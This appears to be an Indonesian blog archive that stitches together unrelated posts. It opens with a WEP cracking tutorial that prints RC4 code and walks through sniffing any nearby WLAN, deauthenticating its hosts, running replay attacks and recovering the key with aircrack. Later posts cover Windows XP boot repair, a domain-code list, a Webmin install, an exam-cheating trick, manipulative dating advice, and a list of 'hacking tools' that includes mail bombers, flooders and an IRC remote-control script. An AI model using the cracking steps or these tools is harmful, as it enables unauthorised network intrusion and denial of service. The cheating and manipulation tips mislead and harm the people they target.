Algoritma yang sebenarnya digunakan oleh WEP untuk mengenkripsi paket yang adalah RC4. RC4 terdiri dari dua langkah: dengan password dan Penjadwalan Algoritma Pseudo Random Generasi Algoritma. Bagian pertama, yang Penjadwalan Algoritma password, atau KSA, seperti ini dalam kode C, assuming k [] adalah array dari password rahasia:

int n = 256;
char s[n];
// initialization
for (int i = 0; i <= (n – 1); i++)
s[i] = i;
int j = 0;
// scrambling
for (int l = 0; l <= (n – 1); l++)
{
j += s[l] + k[l];
swap(s[l], s[j]);
}

Mari kita telaah kode di atas hingga kita tahu bahwa:

1. Integer ‘n’ menentukan seberapa kuay enkripsi yang kita buat. WEP disini menggunakan 256.
2. Array karakter ‘k’ adalah password rahasia yang dikombinasikan dengan tiga karakter palsu. Hal ini tidak berubah sama sekali dalam program ini.
3. Tanda ’//Inisialisasi’ hanya merupakan inisialisasi, sebanyak karakter 0-255.
4. Integer ‘j’ digunakan untuk memegang nilai selama scrambling. Selalu diinisialisasi ke 0, karena harus selalu di mulai 0.
5. Selanjutnya, (di mana ‘/ / scrambling’) scrambling proses dimulai. Pada dasarnya akan menghasilkan ’s’ array “acak” dari sebelumnya ‘ s’ array yang ditentukan.
6. Di dalam lingkaran, yang pertama mereka merges password (k) dengan acak array (s) untuk membuat sebuah karakter selesai. Lalu, panggilan untuk swap () menempatkan ke dalam array dari karakter selesai.

Sekarang saatnya untuk bagian kedua dari algoritma RC4, maka Algoritma Pseudo Random Generation (PRGA). Bagian ini output streaming password berdasarkan KSA’s pseudo-acak array. Streaming key ini akan digabung dengan data cleartext untuk menciptakan data yang dienkripsi.

int i = 0;
int j = 0;
int z;
while (data_disini)
{
i++;
j += s[i];
swap(s[i], s[j]);
z = s[s[i] + s[j]];
// z is outputted here
// and then XOR’d with cleartext
}
1. Integers’ i ‘dan’ j ‘telah dideklarasikan dan diinisialisasi ke 0.
2. Terdapat satu lingkaran yang berjalan sampai akhir paket data tersebut tercapai.
3. ‘I’ adalah incremented dalam setiap perulangan dari lingkaran itu agar tetap berjalan.
4. ‘J’ memegang pseudo-nomor acak.
5. Pemanggil lain untuk swap () karakter yang aktif dalam s [i], dan s [j].
6. ‘Z’ dihitung dengan menambahkan s [i], dan s [j] dan mengambil nilai dalam elemen sesuai jumlah mereka. Alasan ini akan dijelaskan nanti.
7. ‘Z’ adalah XOR’d dengan cleartext untuk membuat teks baru dienkripsi.

Berhubung dgn putaran CRC stands for redundancy checksum. Ketika paket-paket yang dikirim ke seluruh jaringan, harus ada cara untuk mengetahui host menerima paket belum rusak dengan cara apapun. Ini adalah tujuan dari CRC. Sebelum data dikirim, CRC menghitung nilai, atau checksum, untuk paket yang akan dikirim dengan paket. Bila diterima, target host menghitung baru dari checksum menggunakan CRC. CRCs Jika cocok, maka paket dari kredibilitas telah dikonfirmasi.

Ringkasnya. Access Point menciptakan pseudo-acak karakter. Mereka bergabung dengan berbagi prechosen password untuk membuat password rahasia. KSA kemudian menggunakan password ini untuk membuat pseudo-acak array, yang digunakan oleh PRGA streaming untuk membuat key. Password ini kemudian di XOR dengan cleartext untuk menciptakan data dienkripsi, dan masuk ke dalam CRC dan membuat checksumnya.

Kemudian, untuk penerimaan host decrypts. Karakter ditambahkan oleh AP yang akan dihapus dan digabung dengan key untuk dikirim kembali bersama dengan password rahasia. Password masuk melalui seluruh proses RC4, dan XOR’d dengan teks terenkripsi, dan menciptakan cleartext checksum. Checksum akan dihapus dan dibuat yang kemudian dibandingkan untuk melihat apakah data selamat, dan apakah ini merupakan pengguna asli.

Bagian II: Cracking WEP

Sebelum kita masuk cracking WEP, mari kita bahas beberapa flaws dalam proses enkripsi:

* Ada 5% kesempatan bahwa nilai dalam s [0]-s [3] tidak akan berubah setelah tiga Iterasi oleh KSA.
* Yang pertama nilai dalam data dienkripsi adalah SNAP, yang 0xAA, atau 170 basis 10. Sniffing pertama dari byte dan teks terenkripsi XOR-ing dengan 170 akan memberikan output byte pertama dari PRGA.
* J format tertentu yang byte yang diberikan oleh AP akan menunjukkan bahwa ia adalah lemah dan mudah untuk di crack. Format ini (B + 3, 255, X), dimana B adalah byte dari password rahasia. Dimana X dapat bernilai apapun.

Kita akan berbicara tentang KSA sekarang. Mari kita menetapkan beberapa variabel untuk “pengujian”:

* Karakter kode yang diambil dari AP adalah 3255,7. Kami sniffed itu dari udara. Kami akan menggunakannya karena hasil tes telah menunjukkan itu adalah kode yang sangat lemah.
* Shared passwordnya adalah 22222. Dalam prakteknya, Anda tidak akan tahu ini.
* N adalah 256.
* Jika ada nilai di atas 256, modulo operasi akan digelar di atasnya. Nilai yang dihasilkan itulah yang akan digunakan.
* Array ’s’ telah dipastikan, dengan nilai 0-255.

Buka program Kismet. Kismet adalah scanner nirkabel bebas untuk Linux. Bila Anda membukanya, Anda akan melihat daftar WLAN yang berada dalam jangkauan. Pilih salah satu dan buat catatan dari keempat rincian berikut ini (perlu diketahui bahwa target komputer didapat dari setiap host pada WLAN):

* AP MAC Address
* MAC Address komputer target.
* WEP – Key digunakan
* Wi-Fi- saluran yang digunakan

Buka Aircrack dan anda akan mulai menangkap paket-paket. Anda juga akan menangkap IVs. Tapi ini memakan waktu lama. Ia bahkan dapat berlangsung selama beberapa jam atau hari untuk menangkap jumlah IVs ke crack password WEP.

Untungnya, kami dapat mempercepatnya. Misalnya, jika WLAN sangat sibuk, maka akan lebih banyak lalu lintas paket IVs, sehingga IVs lebih mudah diambil. Jika kami terus ping ke jaringan, akan menghasilkan lebih banyak paket data.

ping-t-l 50000 ip_address

Jadi apa yang harus dilakukan sekarang? Kami memiliki sedikit data, tetapi kita harus mendapatkan password WEP di sini. Ada waktu untuk meloloskan void11. Void11 yang di deauthenticate AP ke semua host yang ada disana. Cutting off dilakukan hingga ke seluruh host. Hal pertama yang dilakukan dalam hal ini adalah automaticall yang akan mencoba untuk menyambung kembali koneksi ke AP.

Namun ada teknik lain yang disebut replay attack. Ini menangkap sebuah paket dari sebuah host pada WLAN, kemudian melakukan spoofs host dan terus mengulang paket berulang ulang. Menghasilkan lalu lintas paket data yang sangat besar. Yang terbaik dari program ini adalah airreplay. Ini adalah untuk apa void11 digunakan.

Buka airodump. Sekarang, ucapkan terima kasih kepada Replay Attack. IV berjalan sekitar 200 per detik. Wow! Anda mungkin akan mendapatkan semua paket yang diperlukan dalam waktu 10 menit. Semua IVs sedang ditulis ke dalam file yang akan diambil. Kemudian buka aircrack. Aircrack akan membaca semua IVs yang di ambil dari file, dan melakukan analisis statistik pada file tsb. Lalu, ia akan berusaha untuk brute force file” yang ada. Setelah menemukan passwordnya, password itu akan diberikan pada anda.
Hehehe.. Finally: Kamu sudah mendapatkan passwordnya

================== [ EOF ] =================

Selamat membaca – Ini gw dedikasikan buat seluruh BinusHacker Community

Doakan usaha gw lancar ye.. Kzkzkz..

Salam buat kalian semua dari Gw [ UtuH ]

Yang ngopy: Tolong sertain nama gw ye.. Kzkzkzkz (*Narses + sarap mode on)

Uyeee…

Memperbaiki Booting pada Komputer

2009-12-22T01:45:00.000-08:00

1. Memperbaiki Instalasi (Repair Install)

Jika Windows XP Anda rusak (corrupted) dimana Anda tidak mempunyai sistem operasi lain untuk booting,
Anda dapat melakukan perbaikan instalasi (Repair Install) yang bekerja sebagaimana setting (pengaturan)
yang awal.

- Pastikan Anda mempunyai kunci (key) Windows XP yang valid.
- Keseluruhan proses akan memakan waktu kurang lebih 1/2 atau 1 jam, tergantung spek komputer Anda.
- Jika Anda dimintai password administrator, sebaiknya Anda memilih opsi perbaikan (repair) yang kedua,
bukan yang pertama.
- Masukkan CD Windows XP Anda dan lakukan booting dari CD tersebut.
- Ketika sudah muncul opsi perbaikan kedua R=Repair, tekan tombol R
Ini akan memulai perbaikan.
- Tekan tombol F8 untuk menyetujui proses selanjutnya “I Agree at the Licensing Agreement”
- Tekan tombol R saat direktori tempat Windows XP Anda terinstal. Biasanya C:\WINDOWS
Selanjutnya akan dilakukan pengecekan drive C: dan mulai menyalin file-file.
Dan secara otomatis restart jika diperlukan. Biarkan CD Anda dalam drivenya.
- Berikutnya Anda akan melihat sebuah gambar “progress bar” yang merupakan bagian dari perbaikan,
dia nampak seperti instalasi XP normal biasanya, meliputi “Collecting Information, Dynamic Update,
Preparing Installation, Installing Windows, Finalizing Installation”.
- Ketika ditanya, klik tombol Next
- Ketika ditanya untuk memasukkan kunci, masukkan kunci (key) Windows XP Anda yang valid.
- Normalnya Anda menginginkan tetap berada dalam nama Domain atau Workgroup yang sama.
- Komputer akan restart.
- Kemudian Anda akan mempunyai layar yang sama sebagaimana pengaktifan sistem ketika instalasi normal.
- Register jika Anda menginginkannya (biasanya tidak diperlukan).
- Selesai

Sekarang Anda bisa log in dengan account Anda yang sudah ada.

2. NTOSKRNL Rusak atau Hilang (Missing or Corrupt)

Jika Anda mendapati pesan error bahwa “NTOSKRNL not found” / NTOSKRNL tak ditemukan, lakukan:
- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Pindahlah ke drive CD Drive Anda berada.
- Ketik: CD i386
- Ketik: expand ntkrnlmp.ex_ C:\Windows\System32\ntoskrnl.exe
- Jika Windows XP Anda terinstal di tempat lain, maka ubahlah sesuai dengan lokasinya.
- Keluarkan CD Anda dan ketikkan EXIT

3. HAL.DLL Rusak atau Hilang (Missing or Corrupt)

Jika Anda mendapatkan error berkenaan dengan rusak atau hilangnya file hal.dll, ada kemungkinan
file BOOT.INI mengalami salah konfigurasi (misconfigured).

- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Ketik: bootcfg /list
Menampilkan isi/masukan pada file BOOT.INI saat ini
- Ketik: bootcfg /rebuild
Memperbaiki konfigurasi dari file BOOT.INI
- Keluarkan CD Anda dan ketikkan EXIT

4. Direktori \WINDOWS\SYSTEM32\CONFIG rusak atau hilang

Jika Anda mendapatkan error dengan tulisan:

“Windows could not start because the following files is missing or corrupt
\WINDOWS\SYSTEM32\CONFIG\SYSTEM or \WINDOWS\SYSTEM32\CONFIG\SOFTWARE”

- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Masukkan password administrator jika diperlukan.
- Ketik: cd \windows\system32\config
- Berikutnya tergantung di bagian mana letak terjadinya kerusakan:
- Ketik: ren software software.rusak ATAU ren system system.rusak
- Berikutnya lagi juga tergantung di bagian mana letak terjadinya kerusakan:
- Ketik: copy \windows\repair\system
- Ketik: copy \windows\repair\software
- Keluarkan CD Anda dan ketikkan EXIT

5. NTLDR atau NTDETECT.COM tak ditemukan (NTLDR or NTDETECT.COM Not Found)

Jika Anda mendapati error bahwa NTLDR tak ditemukan saat booting:

a. Untuk partisi tipe FAT
- Silakan Anda melakukan booting dari disket Win98 Anda dan salinlah file NTLDR atau NTDETECT.COM
dari direktori i386 ke drive induk (root) C:\

b. Untuk partisi tipe NTFS
- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Masukkan password administrator jika diperlukan.
- Masukkan perintah berikut, dimana X: adalah alamat drive dari CD ROM Anda (Sesuaikan!).
- Ketik: COPY X:\i386\NTLDR C\:
- Ketik: COPY X:\i386\NTDETECT.COM C:\
- Keluarkan CD Anda dan ketikkan EXIT

DAFTAR KODE NEGARA UNTUK NAMA DOMAIN

2009-11-24T01:19:00.001-08:00

Pada postingan kali ini, Tips dan Trik Blog akan mengetengahkan Daftar Kode Negara untuk Nama Domain. Mungkin postingan ini bermanfaat, siapa tahu ada yang membutuhkan hal ini sebagai pengetahuan. Demikian daftar kode tersebut.

A
.ac Ascension Island
.ad Andorra
.ae United Arab Emirates
.af Afghanistan
.ag Antigua and Barbuda
.ai Anguilla
.al Albania
.am Armenia
.an Netherlands Antilles
.ao Angola
.aq Antarctica
.ar Argentina
.as American Samoa
.at Austria
.au Australia
.aw Aruba
.az Azerbaijan

B
.ba Bosnia and Herzegowina
.bb Barbados
.bd Bangladesh
.be Belgium
.bf Burkina Faso
.bg Bulgaria
.bh Bahrain
.bi Burundi
.bj Benin
.bm Bermuda
.bn Brunei Darussalam
.bo Bolivia
.br Brazil
.bs Bahamas
.bt Bhutan
.bv Bouvet Island
.bw Botswana
.by Belarus
.bz Belize

C
.ca Canada
.cc Cocos (Keeling) Islands
.cd Congo
.cf Central African Republic
.cg Congo
.ch Switzerland
.ci Cote D'Ivoire
.ck Cook islands
.cl Chile
.cm Cameroon
.cn China
.co Colombia
.cr Costa Rica
.cu Cuba
.cv Cape Verde
.cx Christmas Island
.cy Cyprus
.cz Czech Republic

D
.de Germany
.dj Djibouti
.dk Denmark
.dm Dominica
.do Dominican Republic
.dz Algeria

E
.ec Ecuador
.ee Estonia
.eg Egypt
.eh Western Sahara
.er Eritrea
.es Spain
.et Ethiopia

F
.fi Finland
.fj Fiji
.fk Falkland Islands (Malvina)
.fm Micronesia, Federal State of
.fo Faroe Islands
.fr France

G
.ga Gabon
.gd .gd – Grenada
.ge Georgia
.gf French Guiana
.gg Guernsey
.gh Ghana
.gi Gibraltar
.gl Greenland
.gm Gambia
.gn Guinea
.gp Guadeloupe
.gq Equatorial Guinea
.gr Greece
.gs South Georgia and the South Sandwich Islands
.gt Guatemala
.gu Guam
.gw Guinea-Bissau
.gy Guyana

H
.hk Hong Kong
.hm Heard and McDonald Islands
.hn Honduras
.hr Croatia/Hrvatska
.ht Haiti
.hu Hungary

I
.id Indonesia
.ie Ireland
.il Israel
.im Isle of Man
.in India
.io British Indian Ocean Territory
.iq Iraq
.ir Iran (Islamic Republic of)
.is Iceland
.it Italy

J
.je Jersey
.jm Jamaica
.jo Jordan
.jp Japan

K
.ke Kenya
.kg Kyrgyzstan
.kh Cambodia
.ki Kiribati
.km Comoros
.kn Saint Kitts and Nevis
.kp Korea, Democratic People's Republic
.kr Korea, Republic of
.kw Kuwait
.ky Cayman Islands
.kz Kazakhstan

L
.la Lao People's Democratic Republic
.lb Lebanon
.lc Saint Lucia
.li Liechtenstein
.lk Sri Lanka
.lr Liberia
.ls Lesotho
.lt Lithuania
.lu Luxembourg
.lv Latvia
.ly Libyan Arab Jamahiriya

M
.ma Morocco
.mc Monaco
.md Moldova, Republic of
.mg Madagascar
.mh Marshall Islands
.mk Macedonia, Former Yugoslav Republic
.ml Mali
.mm Myanmar
.mn Mongolia
.mo Macau
.mp Northern Mariana Islands
.mq Martinique
.mr Mauritania
.ms Montserrat
.mt Malta
.mu Mauritius
.mv Maldives
.mw Malawi
.mx Mexico
.my Malaysia
.mz Mozambique

N
.na Namibia
.nc New Caledonia
.ne Niger
.nf Norfolk Island
.ng Nigeria
.ni Nicaragua
.nl Netherlands
.no Norway
.np Nepal
.nr Nauru
.nu Niue
.nz New Zealand

O
.om Oman

P
.pa Panama
.pe Peru
.pf French Polynesia
.pg Papua New Guinea
.ph Philippines
.pk Pakistan
.pl Poland
.pm St. Pierre and Miquelon
.pn Pitcairn Island
.pr Puerto Rico
.ps Palestinian Territories
.pt Portugal
.pw Palau
.py Paraguay

Q
.qa Qatar

R
.re Reunion Island
.ro Romania
.ru Russian Federation
.rw RwAnda

S
.sa Saudi Arabia
.sb Solomon Islands
.sc Seychelles
.sd Sudan
.se Sweden
.sg Singapore
.sh St. Helena
.si Slovenia
.sj Svalbard and Jan Mayen Islands
.sk Slovak Republic
.sl Sierra Leone
.sm San Marino
.sn Senegal
.so Somalia
.sr Suriname
.st Sao Tome and Principe
.sv El Salvador
.sy Syrian Arab Republic
.sz Swaziland

T
.tc Turks and Caicos Islands
.td Chad
.tf French Southern Territories
.tg Togo
.th Thailand
.tj Tajikistan
.tk Tokelau
.tm Turkmenistan
.tn Tunisia
.to Tonga
.tp East Timor
.tr Turkey
.tt Trinidad and Tobago
.tv Tuvalu
.tw Taiwan
.tz Tanzania

U
.ua Ukraine
.ug UgAnda
.uk United Kingdom
.um US Minor Outlying Islands
.us United States
.uy Uruguay
.uz Uzbekistan

V
.va Holy See (City Vatican State)
.vc Saint Vincent and the Grenadines
.ve Venezuela
.vg Virgin Islands (British)
.vi Virgin Islands (USA)
.vn Vietnam
.vu Vanuatu

W
.wf Wallis and Futuna Islands
.ws Western Samoa

Y
.ye Yemen
.yt Mayotte
.yu Yugoslavia

Z
.za South Africa
.zm Zambia
.zw Zimbabwe

instalasi webmin untuk memudahkan konfigurasi FreeBSD

2009-10-18T03:42:00.001-07:00

sekali lagi seorang noebi ingin berbagi cerita, yah sekedar seceloteh dua celoteh.... mohon maaf kalo sudah ada yang pernah ngepost hal ini, atau mungkin lebih baik dari posting ini.....sekali lagi noebi juga manusia....

sebelumnya siapin rokok 1 bungkus (utk yg ngerokok, kebetulan ane nggak, n ni ruangan ber-AC nanti bengek lageee...), plus Kopi MIX bagi yg ngopi (ane cukup aer putih biar sehat).....

web min ini gw kenal semenjak 2002, waktu itu temen gw yg ajarin, cuma pertama kali install gw pake RH 7.2, cobain di Fedora, slackware dan terakhir di CentOS. semuanya mulus, cuma ya itu tetap aja ada kekurangan untuk masalah module, yah mungkin tidak smua modules terinstall, paling tidak kita harus update modulenya terus.

siapkan semua persenjataaannya dan kita memulai edit mengedit…

langsung to the poin aja ya..

pertama download dulu file webmin-1.360.tar.gz (webmin terbaru dari webmin dot com)

untuk webmin ini jangan lupa installkan perl, dan pastikan perl terinstall di box freebsd kalian.

kita download dulu webminnya:

mybsd# wget http://umn.dl.sourceforge.net/sourcefor ... 360.tar.gz

sampe 100% yah, kalau sudah done.

kita extract file webmin tersebut:

mybsd#tar xfvz webmin-1.360.tar.gz

kalau sudah terextract. masuklah ke folder extract tadi:

mybsd#cd webmin-1.360

mulailau penginstalan

mybsd#./setup.sh
***********************************************************************
* Welcome to the Webmin setup script, version 1.360 *
***********************************************************************
Webmin is a web-based interface that allows Unix-like operating
systems and common Unix services to be easily administered.

Installing Webmin in /root/webmin-1.360 …

***********************************************************************
Webmin uses separate directories for configuration files and log files.
Unless you want to run multiple versions of Webmin at the same time
you can just accept the defaults.

Config file directory [/etc/webmin]: /etc/webmin <——– Isi mengikuti default
Log file directory [/var/webmin]: /var/webmin <——– Isi mengikuti default

***********************************************************************
Webmin is written entirely in Perl. Please enter the full path to the
Perl 5 interpreter on your system.

Full path to perl (default /usr/bin/perl): /usr/bin/perl <——– Isi mengikuti default

Testing Perl …
Perl seems to be installed ok <=== Ingat install perl terlebih dahulu

***********************************************************************
Operating system name: FreeBSD
Operating system version: 5.3

***********************************************************************
Webmin uses its own password protected web server to provide access
to the administration programs. The setup script needs to know :
- What port to run the web server on. There must not be another
web server already using this port.
- The login name required to access the web server.
- The password required to access the web server.
- If the webserver should use SSL (if your system supports it).
- Whether to start webmin at boot time.

Web server port (default 10000): 666 <====== Terserah, gantilah angka yg anda suka

Login name (default admin): admin
Login password:
Password again:
The Perl SSLeay library is not installed. SSL not available.
Start Webmin at boot time (y/n): y <====== konfirmasi untuk startup webmin pada saat booting
***********************************************************************
Creating web server config files..
..done

Creating access control file..
..done
Inserting path to perl into scripts..
..done

Creating start and stop scripts..
..done

Copying config files..

..done

Configuring Webmin to start at boot time..
..done

Creating uninstall script /etc/webmin/uninstall.sh ..
..done

Changing ownership and permissions ..
..done

Running postinstall scripts ..
: Permission denied
..done

Attempting to start Webmin mini web server..
Starting Webmin server in /root/webmin-1.360
..done

***********************************************************************
Webmin has been installed and started successfully. Use your web
browser to go to

http://mybsd.lelakimipa.net:666/ <======= Jadi deghhhh

and login with the name and password you entered previously.

silahkah tinggal di uji coba, jadi lebih mudah degh konfigurasi freebsd nya, kemungkinan nanti teman2 ada kendala di modules, karena tidak setiap service ada modulenya di webmin, jadi harus install manual lagi, dan lebih dulu cari relasi module antara webmin dan servicenya.

Trik Ujian 'ala' anak sekolahan

2009-10-02T03:45:00.000-07:00

Cara Curang Saat Ujian with no soft, etc

Sekedar mau share, untuk jaga2 kalo" ada guru disini bisa diliat2 muridnya... don't try this at school..! kecuali lo punya nyali gede

Step One
Ngetik jawaban trus buat font sekecil mungkin s/d terlihat jelas..........

Step Two
Abis itu di Print trus di Fotocopy ....

Step Three
Nah abis di Fotocopy lalu selotip bening....

Step Four
celup di air Dingin 5-10menit .....

Step Five
buang deh kertas yg nempel di selotip tadi, entar fontnya ketinggalan di selotip tadi....

lihat hasilnya........

Step Six
tempel deh terserah bisa di ......

atau di .........

pokoknya tergantung kreatifitas masing masing ye.....

all is tested by me... working 100% tergantung kejelian kamu masing"
[secara jg gw masih sekolah di stm jek ]

Sumber : INDOWEBSTER FORUM.(http://www.indowebster.web.id/showthread.php?t=45392)

Change Your Ip Kurang Kemudian Dalam 1 Menit

2009-10-02T03:40:00.000-07:00

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address.

><

1. Klik pada "Start" di pojok kiri bawah layar
2. Klik "Run"
3. Ketik "command" dan tekan ok

Anda sekarang harus pada prompt MSDOS layar.

4. Ketik "ipconfig / release" hanya seperti itu, dan tekan tombol "enter"
5. Ketik "exit" dan meninggalkan prompt
6. Klik kanan pada "Network Places" atau "My Network Places" di desktop Anda.
7. Klik pada "properties"

Anda sekarang harus di layar dengan sesuatu yang berjudul "Local Area Connection", atau sesuatu yang dekat dengan itu, dan, jika Anda memiliki jaringan hooked up, semua jaringan lain.

8. Klik kanan pada "Local Area Connection" dan klik "properties"
9. Double-klik pada "Internet Protocol (TCP / IP)" dari daftar di bawah tab "General"
10. Klik pada "Gunakan alamat IP berikut" di bawah "General" tab
11. Buat sebuah alamat IP (Tidak peduli apa itu. Aku hanya tipe 1 dan 2 sampai i mengisi daerah atas).
12. Tekan "Tab" dan harus secara otomatis mengisi "Subnet Mask" bagian dengan nomor standar.
13. Hit the "Ok" tombol di sini
14. Hit the "Ok" tombol lagi

Anda sekarang harus kembali ke "Local Area Connection" screen.

15. Klik kanan kembali pada "Local Area Connection" dan pergi ke properti lagi.
16. Kembali ke "TCP / IP" Pengaturan
17. Kali ini, pilih "Mendapatkan alamat IP secara otomatis"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" lagi
20. Anda sekarang memiliki alamat IP yang baru

Dengan sedikit latihan, Anda dapat dengan mudah mendapatkan proses ini turun hingga 15 detik.

P.S:
Ini hanya perubahan alamat IP dinamis, bukan ISP / IP address

Permainan Yang Disukai Wanita, Pria Harus Tau!

2009-10-02T03:37:00.000-07:00

Semua wanita pasti pengen punya pasangan seorang pria yg baik dong, tapi sayangnya banyak pria2 yg baik hati itu juga membosankan hehehe...
Maka supaya hubungan tidak menjadi membosankan, para cowok harus tahu beberapa permainan yang disukai oleh para wanita.

1. Wanita suka dengan seorang pria yg unpredictable,
Misalnya kamu ditanya "Kamu kerja apa sekarang?"
Jangan berikan jawaban standar yg membosankan seperti "Ow gue ini akuntan yang bertugas membuat pembukuan dan menghitung bla..bla..bla..."
Sebagai gantinya jawab saja dengan bercanda "Gue kerja di kebon binatang jadi pelatih Kuda Nil..."
Biasanya cewek akan tertawa dengan jawaban ini lalu mendesak lebih lanjut "ah serius dong,lu kerja dimana?"
Jangan menyerah dan terus saja ajak bercanda...

2. Jangan terlalu mudah memberikan apa yg diinginkan oleh wanita.
Misalnya, wanita suka mendengar kalimat "I love U", maka jangan terlalu mudah memberikan kalimat ini, buat dia berusaha keras sampai agak desperate dulu untuk memperoleh kalimat ini dari kita.
Sebaliknya kalau si ce itu duluan yg bilang "aku sayang banget sama kamu", jangan beri jawaban standar seperti "aku juga" atau "i love u too"
tapi justru lihat dia dengan agak mengejek dan katakan "gue tau..."
(wuaaaah !!! lu cool banget dimata cewek lu !!)

3. Wanita suka bermain,
sayangnya para pria lebih suka srudak sruduk, yang penting cepat mencapai tujuan...
jangan begitu, wanita suka di goda! sudah sejak taman kanak2 wanita suka kalau di gangguin oleh anak2 laki yg iseng2, ini sifat alamiah yg tidak boleh dihapus begitu saja.
caranya pikir sendiri, ada macem2, yg pasti permainan orang dewasa sudah bukan seperti anak2 SD yg bawa2 ulat untuk nakutin temen2 cewek dikelas...
dsb...
Yah kira2 begitu deh...

tapi masalah selanjutnya adalah, biasanya cowok tuh kalo sudah dapetin cewek apalagi sudah merid selama beberapa tahun, biasanya sudah males main2, males becandain atau menggoda pasangannya (bahkan beberapa pria lebih suka menggoda tetangga...)
pikirannya "ah gue kan udah dapet, ngapain lagi capek2..."
atau ada juga yg berkata "ah gile aja, ngapain gue ngegodain bini gue sendiri..."
...apalagi kalo istrinya sudah berubah menjadi kuda nil yg tiap hari tiduran di sofa sambil nonton infoteimen...
(nah kali ini lu beneran udah jadi pelatih Kuda Nil... kemakan omongan lu sendiri)

hehehe...

Edit:
Tambahan info buat poin no 3...

Permainan orang dewasa itu misalnya begini,
(contoh)
Pas lu mau cium pasangan lu, berhentilah 1 cm didepan bibirnya dan biarkan dia menunggu beberapa saat... (apalagi kalau ini ciuman pertama, wiiih 1 detik itu terasa 5 minggu baginya...)
Setelah ciuman hangat beberapa saat, lepaskan dan ajak dia ngobrol seperti tidak ada apa2,
lalu cium dia lagi lebih dalam...
terus?
ya lepas lagi dan ajak ngobrol lagi dengan santai

Cewek tau koq kalau dia sedang di permainkan (hati dan napsunya), dan mereka senang!
Wanita suka dengan pria yang bisa mengontrol, bisa bermain dan bisa menggoda...

99% cowok cuma bisa srudak sruduk, jadilah 1% cowok yg istimewa...

kl berkenan bagi ya..

maaf kalo

cuma mau kasih

jangan di

SPESIAL EDITION "TOOLS HACKING"

2009-09-27T21:53:00.000-07:00

Mail Bomber

ICQ Flooder

Pinger

Port Scanner

Flooder HTTP/ Flooder

IP Calculation

UDP Flooder

and more ...

1. Net Tools 4.0

The last version of the Net Tools at the moment. This tool has a whole package of tools that can be used by internet users.

(download)
http://files.filefront.com/NetTools_40171zip/;4491206;;/fileinfo.html

2.Net Tools 3.1

Net Tools 3.0 was the 3rd version of Internet Tools Project.

It was totally rewritten and had many new advanced features. Net Tools 4 has it's inherits. (download)
http://www.astalavista.com/index.php?section=directory&linkid=3163

3.Science

This new section has very nice e-books about modern physics, mathematics, and other very interesting subjects. (start reading )
http://users.pandora.be/ahmadi/science.htm

4.mIRC Self-Replicating

ScriptThis tutorial will teach you how to make a Self-Replicating mIRC Script. You can teach the basics of mIRC script by reading this tutorial.

5.Net Tools 2.0

Net Tools 2.0 is the second main version of Net Tools, it has the same core and structure as the first version but with extra tools.

(download)
http://www.astalavista.com/index.php?section=directory&linkid=1008

6.mIRC Remote Control

Script With this tutorial you can learn how to obtain remote control on user's PC by using an IRC Remote Access mIRC Script.

7.Net Tools 1.0

The first version of Net Tools. (download)
http://www.astalavista.com/index.php?section=directory&linkid=1008

8.Superscan
Salah satu tool yang mampu melakukan flood

serta mampu memutuskan komputer orang lain dari service yang sedang digunakan
http://www.geocities.com/vaksin13/zip/hacking/superscan.zip

Semoga Bermanfa'at
Salam
TheDhay

INTERNET TOOLS YG BIASA DI PERGUNAKAN U/ HACKING

Hanya Sekedar Informasi:
Apabila Anda ingin Hacking ( Anda Harus Memiliki Tools ini )
Internet Tools Yg Sering di Pergunakan U/ Alat Bantu Hacking:

Bandwidth Meter,
IP Address Scanner,
IP Calculator,
IP Converter,
Port Listener,
Port Scanner,
Ping,
NetStat (2 ways),
Trace Route (2 ways),
TCP/IP Configuration,
Online - Offline Checker,
Resolve Host & IP, Time Sync,
Whois & MX Lookup,
Connect0r,
Connection Analysator and prtotector,
Net Sender,
E-mail seeker,
Net Pager,
Active and Passive port scanner,
Spoofer,
Hack Trapper,
HTTP flooder (DoS),
Mass Website Visiter,
Advanced Port Scanner,
Trojan Hunter (Multi IP),
Port Connecter Tool,
Advanced Spoofer,
Advanced Anonymous E-mailer,
Simple Anonymous E-mailer,
Anonymous E-mailer with Attachment Support,
Mass mailer,
E-mail Bomber,
E-mail Spoofer,
Simple Port Scanner (fast),
Advanced Netstat Monitoring,
X Pinger,
Web Page Scanner,
Fast Port Scanner,
Deep Port Scanner,
Fastest Host Scanner (UDP),
Get Header, Open Port Scanner,
Multi Port Scanner,
HTTP scanner (Open port 80 subnet scanner),
Multi Ping for Cisco Routers,
TCP Packet Sniffer,UDP flooder,
Resolve and Ping, Multi IP ping,
File Dependency Sniffer,
EXE-joiner (bind 2 files),
Encrypter, Advanced Encryption,
File Difference Engine,
